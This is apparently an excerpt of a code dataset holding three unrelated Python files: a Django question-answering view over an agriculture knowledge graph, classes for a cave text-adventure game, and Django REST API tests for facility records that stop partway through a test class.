text stringlengths 957 885k |
|---|
# -*- coding: utf-8 -*-
"""
@author: charlesXu
@file: question_answering.py
@desc: Question-answering implementation over the agriculture knowledge graph.
@time: 2019/01/26
"""
import random
import re

from django.shortcuts import render

from Chatbot_KG.toolkit.pre_load import pre_load_thu
from Chatbot_KG.toolkit.pre_load import neo_con

# City whitelist: a recognised place name is only answered directly when it
# appears in this list (one city per line in the file).
city_list = []
# FIX: raw string — the original plain literal contained invalid escape
# sequences ("\p", "\d", ...) that only worked by accident and raise
# SyntaxWarning on modern Python. The runtime value is unchanged.
filePath = r'F:\project\Agriculture_KnowledgeGraph\demo\label_data\city_list.txt'
with open(filePath, 'r', encoding='utf8') as fr:
    for city in fr.readlines():
        city_list.append(city.strip())

thu_lac = pre_load_thu  # preloaded THULAC segmenter / POS tagger
db = neo_con            # preloaded Neo4j connection wrapper
# Get (address -(中文名)-> ?)
def get_chinese_name(address):
    """Return the title reached from *address* via the "中文名"
    (Chinese name) relation, or 0 when no such edge exists."""
    matches = db.findOtherEntities(address, "中文名")
    if len(matches) == 0:
        return 0
    return matches[0]['n2']['title']
# Get (? <-(中文名)- address), i.e. follow the relation in reverse.
def get_chinese_name2(address):
    """Return the title of an entity whose "中文名" edge points AT
    *address*, or 0 when no such edge exists."""
    matches = db.findOtherEntities2(address, "中文名")
    if len(matches) == 0:
        return 0
    return matches[0]['n1']['title']
# Get the concrete administrative level of an address.
def get_xinghzhengjibie(address):
    """Return the administrative level ("行政类别") of *address*
    (e.g. 市/县/镇), or 0 when the property is absent."""
    matches = db.findOtherEntities(address, "行政类别")
    if not matches:
        return 0
    return matches[0]['n2']['title']
# Get the climate of an address.
def get_city_weather(address):
    """Return the climate entity ("气候") linked to *address*, or 0."""
    matches = db.findOtherEntities(address, "气候")
    if not matches:
        return 0
    return matches[0]['n2']['title']
def get_weather_plant(weather, ret_dict):
    """Record plants suited to the climate *weather* in *ret_dict*.

    Samples at most 6 plants linked by "适合种植" (suitable to plant).
    When a sampled entity is a family (name ends in "科"), additionally
    samples at most 6 concrete member plants of that family.  Triples go
    into ``ret_dict['list']`` and plain answers into ``ret_dict['answer']``.
    Returns the (mutated) ret_dict.
    """
    def _append_triple(triple):
        # ret_dict['list'] is created lazily on first use.
        if ret_dict.get('list') is None:
            ret_dict['list'] = []
        ret_dict['list'].append(triple)

    def _append_answer(answer):
        if ret_dict.get('answer') is None:
            ret_dict['answer'] = [answer]
        else:
            ret_dict['answer'].append(answer)

    def _sample_indices(count, k=6):
        # Uniform sample of at most k indices, ascending — same distribution
        # as the original hand-rolled selection sampling, via random.sample.
        if count > k:
            return sorted(random.sample(range(count), k))
        return list(range(count))

    plant = db.findOtherEntities(weather, "适合种植")
    for i in _sample_indices(len(plant)):
        selected_plant = plant[i]['n2']['title']
        # (the original also read plant[i]['rel']['type'] into an unused
        # local `relation`; that dead read has been removed)
        if selected_plant[-1] == "科":
            # A plant family: expand into its concrete member plants.
            concrete_plant_list = db.findOtherEntities2(selected_plant, "科")
            _append_triple({"entity1": weather, "rel": "适合种植", "entity2": selected_plant,
                            "entity1_type": "气候", "entity2_type": "植物"})
            for j in _sample_indices(len(concrete_plant_list)):
                concrete_plant = concrete_plant_list[j]['n1']['title']
                _append_triple({"entity1": concrete_plant, "rel": "科", "entity2": selected_plant,
                                "entity1_type": "植物科", "entity2_type": "植物"})
                _append_answer(concrete_plant)
        else:
            _append_triple({"entity1": weather, "rel": "适合种植", "entity2": selected_plant,
                            "entity1_type": "气候", "entity2_type": "植物"})
            _append_answer(selected_plant)
    return ret_dict
# Get the city that a county / municipal district belongs to.
def get_shi_address(address):
    """Return the parent city of *address*, retrying via its Chinese-name
    alias when the direct lookup finds nothing; 0 on total failure."""
    rel = "located in the administrative territorial entity"
    upper = db.findOtherEntities(address, rel)
    if len(upper) == 0:
        address = get_chinese_name(address)
        upper = db.findOtherEntities(address, rel)
        if len(upper) == 0:
            return 0
    return upper[0]['n2']['title']
# Build the answer: plants suited to a city's climate.
def get_shi_plant(address, ret_dict):
    """Fill *ret_dict* with plants suited to the climate of city *address*.

    Falls back to the entity's Chinese-name alias when *address* itself is
    not in the city whitelist.  Returns ret_dict (possibly unchanged).
    """
    if address not in city_list:
        address = get_chinese_name(address)
        if address not in city_list:
            return ret_dict
    weather = get_city_weather(address)
    if weather != 0:
        if ret_dict.get('list') is None:
            ret_dict['list'] = []
        ret_dict['list'].append({'entity1': address, 'rel': '气候', 'entity2': weather,
                                 'entity1_type': '地点', 'entity2_type': '气候'})
        # Sample up to 6 plants suited to this climate (fewer -> all).
        # BUG FIX: the Chinese-name fallback branch used to pass the place
        # name instead of the climate entity to get_weather_plant(); the
        # climate is always what that helper queries on.
        ret_dict = get_weather_plant(weather, ret_dict)
    return ret_dict
def get_shi_weather(address, ret_dict):
    """Fill *ret_dict* with the climate of city *address*.

    Falls back to the entity's Chinese-name alias when *address* itself is
    not in the city whitelist.  Returns ret_dict (possibly unchanged).
    """
    if address not in city_list:
        address = get_chinese_name(address)
        if address not in city_list:
            return ret_dict
    weather = get_city_weather(address)
    if weather != 0:
        if ret_dict.get('list') is None:
            ret_dict['list'] = []
        # CONSISTENCY FIX: record the resolved (whitelisted) name as entity1;
        # the original fallback branch logged the raw input name here, unlike
        # its sibling get_shi_plant which records the resolved name.
        ret_dict['list'].append({'entity1': address, 'rel': '气候', 'entity2': weather,
                                 'entity1_type': '地点', 'entity2_type': '气候'})
        if ret_dict.get('answer') is None:
            ret_dict['answer'] = [weather]
        else:
            ret_dict['answer'].append(weather)
    return ret_dict
def get_xian_plant(address, ret_dict):
    """Answer "what to plant" for a county by delegating to its parent city."""
    upper = get_shi_address(address)
    if upper in city_list:
        return get_shi_plant(upper, ret_dict)
    # The parent is not whitelisted directly — try its name aliases.
    alias = get_chinese_name2(upper)
    if alias == 0:
        alias = get_chinese_name(upper)
    return get_shi_plant(alias, ret_dict)
def get_xian_weather(address, ret_dict):
    """Answer "what climate" for a county by delegating to its parent city."""
    upper = get_shi_address(address)
    if upper in city_list:
        return get_shi_weather(upper, ret_dict)
    # The parent is not whitelisted directly — try its name aliases.
    alias = get_chinese_name2(upper)
    if alias == 0:
        alias = get_chinese_name(upper)
    return get_shi_weather(alias, ret_dict)
def get_xian_address(address):
    """Return the county containing *address* (reverse "contains
    administrative territorial entity" edge), or 0 when none exists."""
    upper = db.findOtherEntities2(address, "contains administrative territorial entity")
    return upper[0]['n1']['title'] if upper else 0
def get_nutrition(obj, ret_dict):
    """Record up to 6 nutrition components ("营养成分") of *obj* in *ret_dict*.

    Triples go into ``ret_dict['list']`` and component names into
    ``ret_dict['answer']``.  Returns the (mutated) ret_dict.
    """
    nutrition = db.findOtherEntities(obj, "营养成分")
    if len(nutrition) == 0:
        return ret_dict
    n = len(nutrition)
    # Uniform sample of at most 6 hits, in ascending order — same result
    # distribution as the original hand-rolled selection sampling.
    indices = sorted(random.sample(range(n), 6)) if n > 6 else range(n)
    for index in indices:
        x = nutrition[index]['n2']['title']
        if ret_dict.get('list') is None:
            ret_dict['list'] = [{'entity1': obj, 'rel': '含有', 'entity2': x,
                                 'entity1_type': '主语', 'entity2_type': '元素'}]
        else:
            ret_dict['list'].append({'entity1': obj, 'rel': '含有', 'entity2': x,
                                     'entity1_type': '主语', 'entity2_type': '元素'})
        if ret_dict.get('answer') is None:
            ret_dict['answer'] = [x]
        else:
            ret_dict['answer'].append(x)
    return ret_dict
def get_plant_knowledge(obj, ret_dict):
    """Record the botanical taxonomy of plant *obj* in *ret_dict*.

    Looks up each taxonomic rank relation in turn — 科 (family), 属 (genus),
    门 (phylum), 纲 (class), 目 (order), 亚目 (suborder), 亚科 (subfamily) —
    and, for every rank that exists, appends a triple to ``ret_dict['list']``
    and the rank's title to ``ret_dict['answer']``.  Returns ret_dict.

    The original body was the same lookup/append sequence copy-pasted seven
    times; it is now a single loop over the relation names (same order, so
    the output order is unchanged).
    """
    for rel in ("科", "属", "门", "纲", "目", "亚目", "亚科"):
        matches = db.findOtherEntities(obj, rel)
        if len(matches) == 0:
            continue
        title = matches[0]['n2']['title']
        if ret_dict.get('list') is None:
            ret_dict['list'] = []
        ret_dict['list'].append({'entity1': obj, 'rel': rel, 'entity2': title,
                                 'entity1_type': '植物', 'entity2_type': '类型'})
        if ret_dict.get('answer') is None:
            ret_dict['answer'] = [title]
        else:
            ret_dict['answer'].append(title)
    return ret_dict
# Question-classification regex table, indexed by q_type in the view below:
#   0 -> "what is suitable to plant in <place>?"
#   1 -> "what climate / weather does <place> have?"
#   2 -> "what nutrients does <subject> contain?"
#   3 -> botany (taxonomy) knowledge about a plant.
pattern = [[r"适合种什么", r"种什么好"],
           [r"气候是什么", "气候类型是什么", r"属于哪种气候", r"是哪种气候", r"是什么天气", r"哪种天气", r"天气[\u4e00-\u9fa5]*"],
           [r"有哪些营养", r"有[\u4e00-\u9fa5]+成分", r"含[\u4e00-\u9fa5]+成分", r"含[\u4e00-\u9fa5]+元素", r"有[\u4e00-\u9fa5]+营养", r"有[\u4e00-\u9fa5]+元素"],
           [r"[\u4e00-\u9fa5]+植物学", r"[\u4e00-\u9fa5]+知识"]]
def question_answering(request):  # content loaded as soon as the index page opens
    """Django view: parse a natural-language question and answer it from the KG.

    Pipeline: classify the question against the regex table ``pattern`` ->
    extract place / noun entities from the THULAC segmentation ->
    query Neo4j via the helpers above -> render the answer template.
    """
    context = {'ctx': ''}
    if(request.GET):
        question = request.GET['question']
        # Segment + POS-tag; text=False returns [word, tag] pairs.
        cut_statement = thu_lac.cut(question, text=False)
        print(cut_statement)
        address_name = []
        weather_name = []   # NOTE(review): assigned but never used below
        question_name = ""  # NOTE(review): assigned but never used below
        ret_dict = {}
        pos = -1     # character offset of the first matching keyword
        q_type = -1  # index into `pattern` (see table above); -1 = no match
        for i in range(len(pattern)):
            for x in pattern[i]:
                index = re.search(x, question)
                if(index):
                    pos = index.span()[0]
                    q_type = i
                    break
            if(pos != -1):
                break
        print(pos)
        # q_type 0: "what is suitable to plant in <place>?"
        if(q_type == 0):
            index = 0
            # Collect place-name candidates that appear before the keyword.
            for x in cut_statement:
                if(index > pos):
                    break
                # NOTE(review): len(x) is the [word, tag] pair length, not
                # len(x[0]) — verify this offset tracking against pos.
                index += len(x)
                if (x[1] == 'ns' or (
                        x[1] == 'n' and (x[0][-1] == '镇' or x[0][-1] == '区' or x[0][-1] == '县' or x[0][-1] == '市'))):
                    address_name.append(x[0])
                elif (x[0] == '崇明'):  # special-cased place name (Chongming)
                    address_name.append(x[0])
            for address in address_name:
                address = address.strip()
                # Resolve the administrative level; if absent, retry via the
                # (address <- 中文名) alias; if still absent, default to 镇 (town).
                xingzhengjibie = get_xinghzhengjibie(address)
                address_chinese_name = 0
                if(xingzhengjibie == 0):
                    address_chinese_name = get_chinese_name2(address)
                    if(address_chinese_name == 0):
                        address_chinese_name = get_chinese_name(address)
                if(xingzhengjibie == 0 and address_chinese_name == 0):
                    xingzhengjibie = '镇'
                elif(xingzhengjibie == 0):
                    xingzhengjibie = get_xinghzhengjibie(address_chinese_name)
                    if(xingzhengjibie == 0):
                        xingzhengjibie = '镇'
                print(xingzhengjibie)
                # City level: check the address (or its Chinese name) against
                # the whitelist and answer directly.
                if(xingzhengjibie == "市" or xingzhengjibie == "地级市" or xingzhengjibie == '直辖市'):
                    ret_dict = get_shi_plant(address, ret_dict)
                elif(xingzhengjibie == "县" or xingzhengjibie == "市辖区"):
                    # County level: answer via the parent city.
                    if(len(ret_dict) == 0 or ret_dict == 0):
                        ret_dict = get_xian_plant(address, ret_dict)
                    if (len(ret_dict) > 0):
                        upper_address = get_shi_address(address)
                        ret_dict['list'].append({'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点', 'entity2_type': '地点'})
                elif(xingzhengjibie == "镇"):
                    # Town level: climb to the county first.
                    upper_address = get_xian_address(address)
                    if(len(ret_dict) == 0 and upper_address != 0):
                        ret_dict = get_xian_plant(upper_address, ret_dict)
                    if(len(ret_dict) > 0):
                        ret_dict['list'].append({'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点', 'entity2_type': '地点'})
        # q_type 1: "what climate does <place> have?"
        if(q_type == 1):
            index = 0
            flag = 0  # set when the question asks about a capital (首都/首府)
            for x in cut_statement:
                if(index > pos):
                    break
                index += len(x)
                if (x[1] == 'ns' or (x[1] == 'n' and (x[0][-1] == '镇' or x[0][-1] == '区' or x[0][-1] == '县' or x[0][-1] == '市'))):
                    address_name.append(x[0])
                elif (x[0] == '崇明'):
                    address_name.append(x[0])
                elif(x[0] == '首都' or x[0] == '首府'):
                    flag = 1
            for address in address_name:
                print(flag)
                if(flag == 1):
                    # The question is about a capital: swap the country /
                    # region for its capital city before resolving.
                    shoudu = db.findOtherEntities(address, "首都")
                    if(len(shoudu) > 0):
                        shoudu = shoudu[0]['n2']['title']
                        if(ret_dict.get('list') is None):
                            ret_dict['list'] = [{'entity1': address, 'rel': '首都', 'entity2': shoudu, 'entity1_type': '地点', 'entity2_type': '地点'}]
                        address = shoudu
                address = address.strip()
                print(address)
                # Same administrative-level resolution as q_type 0 above.
                xingzhengjibie = get_xinghzhengjibie(address)
                address_chinese_name = 0
                if (xingzhengjibie == 0):
                    address_chinese_name = get_chinese_name2(address)
                    if (address_chinese_name == 0):
                        address_chinese_name = get_chinese_name(address)
                if (xingzhengjibie == 0 and address_chinese_name == 0):
                    xingzhengjibie = '镇'
                elif (xingzhengjibie == 0):
                    xingzhengjibie = get_xinghzhengjibie(address_chinese_name)
                    if (xingzhengjibie == 0):
                        xingzhengjibie = '镇'
                print(xingzhengjibie)
                if (xingzhengjibie == "市" or xingzhengjibie == "地级市" or xingzhengjibie == '直辖市'):
                    ret_dict = get_shi_weather(address, ret_dict)
                elif (xingzhengjibie == "县" or xingzhengjibie == "市辖区"):
                    if (len(ret_dict) == 0 or ret_dict == 0):
                        ret_dict = get_xian_weather(address, ret_dict)
                    if (len(ret_dict) > 0 and ret_dict != 0):
                        upper_address = get_shi_address(address)
                        ret_dict['list'].append(
                            {'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点',
                             'entity2_type': '地点'})
                elif (xingzhengjibie == "镇"):
                    upper_address = get_xian_address(address)
                    if (len(ret_dict) == 0 or ret_dict == 0):
                        ret_dict = get_xian_weather(upper_address, ret_dict)
                    if (len(ret_dict) > 0 and ret_dict != 0):
                        ret_dict['list'].append(
                            {'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点',
                             'entity2_type': '地点'})
        # q_type 2: "what nutrients does <subject> contain?"
        zhuyu = ""  # the question's subject, built from consecutive nouns
        if(q_type == 2):
            index = 0
            for x in cut_statement:
                if(index > pos):
                    break
                index += len(x)
                if(x[1] == 'n'):
                    zhuyu = zhuyu + x[0]
            if(len(zhuyu) > 0):
                ret_dict = get_nutrition(zhuyu, ret_dict)
        # q_type 3: botany (taxonomy) knowledge of a plant.
        zhuyu = ""
        if(q_type == 3):
            index = 0
            for x in cut_statement:
                if(index > pos):
                    break
                index += len(x)
                if(x[1] == 'n'):
                    zhuyu = zhuyu + x[0]
            if(len(zhuyu) > 0):
                ret_dict = get_plant_knowledge(zhuyu, ret_dict)
        print(ret_dict)
        if(len(ret_dict) != 0 and ret_dict != 0):
            return render(request, 'qa/question_answering.html', {'ret': ret_dict})
        print(context)
        # No answer found — render the "not found" message.
        return render(request, 'qa/question_answering.html', {'ctx': '暂未找到答案'})
    return render(request, 'qa/question_answering.html', context)
# This is where the classes and objects are defined
import random
class Game:
    """Top-level game configuration: difficulty, run length and cave map."""

    def __init__(self, difficulty, length, cave_map):
        # Store the configuration exactly as supplied by the caller.
        self.difficulty = difficulty
        self.length = length
        self.cave_map = cave_map
class Condition:
    """A named status effect with damage, AC modifier and duration fields."""

    def __init__(self, name, damage, ac_reduction, duration):
        self.name = name
        self.damage = damage
        self.ac_reduction = ac_reduction
        self.duration = duration
# Pre-built status effects; `conditions` is the catalogue of all of them.
# Only `poisoned` deals per-tick damage; the other two are placeholders.
poisoned = Condition(name='poisoned', damage=1, duration=0, ac_reduction=0)
hobbled = Condition(name='hobbled', damage=0, duration=1, ac_reduction=0)  # not implemented
blind = Condition(name='blind', damage=0, duration=1, ac_reduction=-4)  # not implemented
conditions = [poisoned, hobbled, blind]
class Weapon:
    """An equippable weapon; apply_condition is 0 or a Condition on hit."""

    def __init__(self, name, attack_bonus, damage, value, apply_condition):
        self.name = name
        self.damage = damage
        self.attack_bonus = attack_bonus
        self.apply_condition = apply_condition
        self.value = value
# Weapon catalogue.  apply_condition is 0 for "none", otherwise the Condition
# the weapon inflicts.  `value` is presumably a price/worth — TODO confirm.
unarmed = Weapon(name='fists', attack_bonus=0, damage=1, value=0, apply_condition=0)
rusty_dagger = Weapon(name='rusty dagger', attack_bonus=0, damage=2, value=50, apply_condition=0)
steel_sword = Weapon(name='steel sword', attack_bonus=1, damage=4, value=200, apply_condition=0)
bow = Weapon(name='bow', attack_bonus=4, damage=3, value=300, apply_condition=0)
poisoned_fangs = Weapon(name='poisoned fangs', attack_bonus=2, damage=1, value=0, apply_condition=poisoned)
wand = Weapon(name='wand', attack_bonus=5, damage=5, value=400, apply_condition=0)
weapons = [unarmed, rusty_dagger, steel_sword, bow, poisoned_fangs, wand]
class Enemy:
    """A hostile creature: combat stats, equipped weapon and XP reward."""

    def __init__(self, name, max_hp, hp, ac, attack, weapon, xp_worth):
        self.name = name
        self.hp = hp
        self.max_hp = max_hp
        self.ac = ac
        self.attack = attack
        self.xp_worth = xp_worth
        self.weapon = weapon
# Bestiary of enemy templates.  NOTE(review): the "<NAME>" strings look like
# redacted placeholders — the intended display names should be restored.
goblin = Enemy(name="Goblin", max_hp=4, hp=4, ac=12, attack=4, weapon=rusty_dagger, xp_worth=1)
goblin_champion = Enemy(name="<NAME>", max_hp=6, hp=6, ac=14, attack=4, weapon=steel_sword, xp_worth=3)
kobold_archer = Enemy(name="<NAME>", max_hp=3, hp=3, ac=10, attack=6, weapon=bow, xp_worth=2)
spider = Enemy(name="Spider", max_hp=3, hp=3, ac=11, attack=5, weapon=poisoned_fangs, xp_worth=3)
enemy_types = [goblin, goblin_champion, kobold_archer, spider]
class PlayerCharacter:
    """The player's hero: combat stats, equipment, progress and position."""

    def __init__(self, max_hp, hp, ac, attack, weapon, xp, level, location, condition, class_, killed):
        self.class_ = class_
        self.max_hp = max_hp
        self.hp = hp
        self.ac = ac
        self.attack = attack
        self.weapon = weapon
        self.xp = xp
        self.level = level
        self.location = location
        self.condition = condition  # 0 when healthy, else a Condition
        self.killed = killed

    def sheet(self):
        """Print the character sheet, including any active condition."""
        print('######################################')
        print(f'# {self.class_} HP {self.hp}/{self.max_hp} AC {self.ac} ATT {self.attack} XP {self.xp}')
        print(f'# {self.weapon.name.capitalize()} equipped DMG {self.weapon.damage} ATT {self.weapon.attack_bonus}')
        print(f'# Enemies killed {self.killed}')
        if self.condition != 0:
            print(f'# {self.condition.name} ')
        print('######################################')
        print('')
# Playable class presets.  NOTE(review): the Wizard starts at level=0 while
# the others start at 1 — confirm whether that is intentional.
ranger = PlayerCharacter(max_hp=8, hp=8, ac=12, attack=1, weapon=bow, xp=0, level=1,
                         location=None, condition=0, class_='Ranger', killed=0)
fighter = PlayerCharacter(max_hp=10, hp=10, ac=14, attack=2, weapon=steel_sword, xp=0, level=1,
                          location=None, condition=0, class_='Fighter', killed=0)
wizard = PlayerCharacter(max_hp=7, hp=7, ac=10, attack=5, weapon=wand, xp=0, level=0,
                         location=None, condition=0, class_='Wizard', killed=0)
player_classes = [ranger, fighter, wizard]
class Tile:
    """One map location: exits, optional trap/enemy, and neighbour links."""

    def __init__(self, ways_out, trap_type, text_description, enemy, link0, link1, link2, link3, visited, start_tile):
        self.ways_out = ways_out
        self.trap_type = trap_type
        self.text_description = text_description
        self.enemy = enemy
        # Neighbour links: 0 = back/previous tile; 1 = left and 2 = forward
        # (when 1 or 3 ways out); 3 = right (when 3 ways out).
        self.link0 = link0
        self.link1 = link1
        self.link2 = link2
        self.link3 = link3
        self.visited = visited
        self.start_tile = start_tile
# Word pools for procedurally generated room descriptions.
cave_word1 = ['a dimly lit', 'an ominously dark', 'an eerily quiet',
              'an uncomfortably cold', 'a horribly humid']
cave_word2 = ['corridor', 'spot', 'room', 'cavern']
cave_word3 = ['with damp walls', 'with a slippery floor', 'traversed by a snaking creek']


def cave_description():
    """Return a random "<adjective> <noun> <detail>" cave description."""
    parts = (random.choice(cave_word1),
             random.choice(cave_word2),
             random.choice(cave_word3))
    return " ".join(parts)
|
# Repository: savannahghi/mle
"""Test for the common views."""
import random
import shutil
import uuid
from functools import partial
from os import path
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls import reverse
from faker import Faker
from model_bakery import baker
from model_bakery.recipe import Recipe
from rest_framework import status
from rest_framework.test import APITestCase
from fahari.common.constants import WHITELIST_COUNTIES
from fahari.common.models import Facility, Organisation, System, UserFacilityAllotment
from .test_utils import patch_baker
# Absolute directory of this test module and the media folder tests write to.
DIR_PATH = path.join(path.dirname(path.abspath(__file__)))
MEDIA_PATH = path.join(DIR_PATH, "media")
# Extra request header simulating a cross-origin caller.
http_origin_header = {"HTTP_ORIGIN": "http://sil.com"}
fake = Faker()  # shared fake-data generator for the tests below
def delete_media_file():
    """Delete the media folder after tests (no-op when it doesn't exist)."""
    if not path.exists(MEDIA_PATH):
        return
    shutil.rmtree(MEDIA_PATH)
def global_organisation():
    """Get — or lazily create — the shared test organisation."""
    fields = {
        "id": "ebef581c-494b-4772-9e49-0b0755c44e61",
        "code": 50,
        "organisation_name": "Demo Hospital",
    }
    try:
        # Reuse the fixture when an earlier test already created it.
        return Organisation.objects.get(**fields)
    except Organisation.DoesNotExist:
        return baker.make(Organisation, **fields)
class LoggedInMixin(APITestCase):
    """Define a logged in session for use in tests."""

    def setUp(self):
        """Create a test user for the logged in session."""
        super(LoggedInMixin, self).setUp()
        username = str(uuid.uuid4())
        # Superuser, with every permission explicitly attached as well.
        self.user = get_user_model().objects.create_superuser(
            email=fake.email(),
            password="<PASSWORD>",
            username=username,
        )
        all_perms = Permission.objects.all()
        for perm in all_perms:
            self.user.user_permissions.add(perm)
        self.user.organisation = self.global_organisation
        self.user.save()
        # Allot the given users to all the facilities in FYJ counties
        self.user_facility_allotment = baker.make(
            UserFacilityAllotment,
            allotment_type=UserFacilityAllotment.AllotmentType.BY_REGION.value,
            counties=WHITELIST_COUNTIES,
            organisation=self.global_organisation,
            region_type=UserFacilityAllotment.RegionType.COUNTY.value,
            user=self.user,
        )
        assert self.client.login(username=username, password="<PASSWORD>") is True
        # Patch model_bakery so every baked object gets the test organisation.
        self.patch_organisation = partial(
            patch_baker, values={"organisation": self.global_organisation}
        )
        self.org_patcher = self.patch_organisation()
        self.org_patcher.start()
        self.addCleanup(self.org_patcher.stop)
        # Bind any extra headers into the client verbs once, up front.
        headers = self.extra_headers()
        self.client.get = partial(self.client.get, **headers)
        self.client.patch = partial(self.client.patch, **headers)
        self.client.post = partial(self.client.post, **headers)

    @property
    def global_organisation(self):
        """Create test organisation for the user."""
        return global_organisation()

    def make_recipe(self, model, **kwargs):
        """Ensure test user part of an organisation."""
        if "organisation" not in kwargs:
            kwargs["organisation"] = self.user.organisation
        return Recipe(model, **kwargs)

    def extra_headers(self):
        """Return an empty headers list."""
        return {}
class DRFSerializerExcelIOMixinTest(LoggedInMixin, APITestCase):
    """Test suite for excel io mixin API."""

    def setUp(self) -> None:
        super().setUp()
        # Imported lazily so Django app loading completes before model import.
        from fahari.ops.models import FacilitySystem
        from fahari.ops.serializers import FacilitySystemSerializer

        versions = baker.make(FacilitySystem, 10, organisation=self.global_organisation)
        self.data = FacilitySystemSerializer(versions, many=True).data

    def test_dump_data(self) -> None:
        """Test `dump_data` action."""
        url = reverse("api:facilitysystem-dump-data")
        data = {"dump_fields": ["facility_data::name", "system_data::name", "version"]}
        response = self.client.get(url, data=data)
        # An xlsx attachment is streamed back on success.
        assert response.status_code == status.HTTP_200_OK
        assert response["content-disposition"] == "attachment; filename=facility systems.xlsx"
        assert response["content-type"] == "application/xlsx; charset=utf-8"

    def test_get_available_fields(self) -> None:
        """Test the `get_available_fields` action."""
        url = reverse("api:facilitysystem-get-available-fields")
        response = self.client.get(url)
        assert response.status_code == status.HTTP_200_OK, response.json()
        assert len(response.data) == 1
        assert response.data[0]["id"] == "*"

    def test_get_filter_form(self) -> None:
        """Test the `get_filter_form` action."""
        url = reverse("api:facilitysystem-get-filter-form")
        response = self.client.get(url)
        assert response.status_code == status.HTTP_200_OK
        assert response["content-type"] == "text/html; charset=utf-8"
class FacilityViewsetTest(LoggedInMixin, APITestCase):
    """Test suite for facilities API (create / retrieve / patch / put)."""

    def setUp(self):
        self.url_list = reverse("api:facility-list")
        super().setUp()

    def test_create_facility(self):
        """Test add facility."""
        data = {
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(self.url_list, data)
        assert response.status_code == 201, response.json()
        assert response.data["mfl_code"] == data["mfl_code"]

    def test_create_facility_no_organisation(self):
        """Test add facility without an explicit organisation."""
        data = {
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            # the user's organisation is used
        }
        response = self.client.post(self.url_list, data)
        assert response.status_code == 201, response.json()
        assert response.data["mfl_code"] == data["mfl_code"]

    def test_create_facility_error_supplied_id(self):
        """Test add facility rejects a client-supplied id."""
        data = {
            "id": uuid.uuid4(),
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(self.url_list, data)
        assert response.status_code == 400, response.json()
        assert (
            "You are not allowed to pass object with an id" in response.json()["id"]
        ), response.json()

    def test_create_facility_error_bad_organisation(self):
        """Test add facility rejects an unknown organisation."""
        data = {
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "organisation": uuid.uuid4(),  # does not exist
        }
        response = self.client.post(self.url_list, data)
        assert response.status_code == 400, response.json()
        assert "Ensure the organisation provided exists." in response.json()["organisation"]

    def test_retrieve_facility(self):
        """Test retrieving facility."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            operation_status="Operational",
            organisation=self.global_organisation,
        )
        response = self.client.get(self.url_list)
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        facility_codes = [a["mfl_code"] for a in response.data["results"]]
        assert facility.mfl_code in facility_codes

    def test_retrieve_facility_with_fields(self):
        """Test retrieving facility with an explicit ?fields= selection."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            operation_status="Operational",
            organisation=self.global_organisation,
        )
        # updated and other audit fields are popped and not returned.
        # BUG FIX: these two literals used to be separate statements, so the
        # second half of the query string was silently dropped; parenthesise
        # them into one implicitly-concatenated literal.
        url = (
            f"{self.url_list}?fields=id,name,mfl_code,"
            "updated,created,updated_by,created_by,organisation"
        )
        response = self.client.get(url)
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        facility_codes = [a["mfl_code"] for a in response.data["results"]]
        assert facility.mfl_code in facility_codes

    def test_retrieve_facility_with_combobox(self):
        """Test retrieving facility via the combobox filter."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            operation_status="Operational",
            organisation=self.global_organisation,
        )
        url = f"{self.url_list}?combobox={facility.pk}"
        response = self.client.get(url)
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        facility_codes = [a["mfl_code"] for a in response.data["results"]]
        assert facility.mfl_code in facility_codes

    def test_retrieve_facility_active(self):
        """Test retrieving facility filtered on active=True."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            operation_status="Operational",
            organisation=self.global_organisation,
        )
        url = f"{self.url_list}?active=True"
        response = self.client.get(url)
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        facility_codes = [a["mfl_code"] for a in response.data["results"]]
        assert facility.mfl_code in facility_codes

    def test_patch_facility(self):
        """Test changing user facility."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            organisation=self.global_organisation,
        )
        edit_code = {"mfl_code": 999999999}
        url = reverse("api:facility-detail", kwargs={"pk": facility.pk})
        response = self.client.patch(url, edit_code)
        assert response.status_code == 200, response.json()
        assert response.data["mfl_code"] == edit_code["mfl_code"]

    def test_put_facility(self):
        """Test changing user and add new facility."""
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            organisation=self.global_organisation,
        )
        data = {
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "organisation": self.global_organisation.pk,
        }
        url = reverse("api:facility-detail", kwargs={"pk": facility.pk})
        response = self.client.put(url, data)
        assert response.status_code == 200, response.json()
        assert response.data["mfl_code"] == data["mfl_code"]
class FacilityFormTest(LoggedInMixin, TestCase):
    """Facility create/update/delete through the HTML form views."""

    def test_create(self):
